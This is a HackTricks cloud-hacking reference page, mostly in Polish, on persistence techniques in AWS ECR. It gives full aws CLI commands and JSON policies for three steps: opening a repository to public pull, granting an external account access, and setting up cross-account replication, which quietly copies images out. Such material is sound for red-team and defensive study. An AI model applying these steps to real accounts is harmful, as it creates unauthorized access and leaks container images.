AWS - ECR Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

Aby uzyskać więcej informacji, sprawdź:

AWS - ECR Enum

Ukryty obraz Docker z złośliwym kodem

Atakujący mógłby przesłać obraz Docker zawierający złośliwy kod do repozytorium ECR i użyć go do utrzymania persistencji w docelowym koncie AWS. Atakujący mógłby następnie wdrożyć złośliwy obraz do różnych usług w ramach konta, takich jak Amazon ECS lub EKS, w sposób ukryty.

Polityka repozytorium

Dodaj politykę do pojedynczego repozytorium, przyznając sobie (lub wszystkim) dostęp do repozytorium:

aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

Zauważ, że ECR wymaga, aby użytkownicy mieli uprawnienia do wywoływania API ecr:GetAuthorizationToken za pomocą polityki IAM zanim będą mogli uwierzytelnić się w rejestrze i przesyłać lub pobierać obrazy z dowolnego repozytorium Amazon ECR.

Polityka rejestru i replikacja między kontami

Możliwe jest automatyczne replikowanie rejestru w zewnętrznym koncie, konfigurując replikację między kontami, gdzie musisz wskazać zewnętrzne konto, w którym chcesz zreplikować rejestr.

Najpierw musisz dać zewnętrznemu kontu dostęp do rejestru za pomocą polityki rejestru takiej jak:

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

Następnie zastosuj konfigurację replikacji:

aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousAWS - EC2 Persistence NextAWS - ECS Persistence

Last updated 8 days ago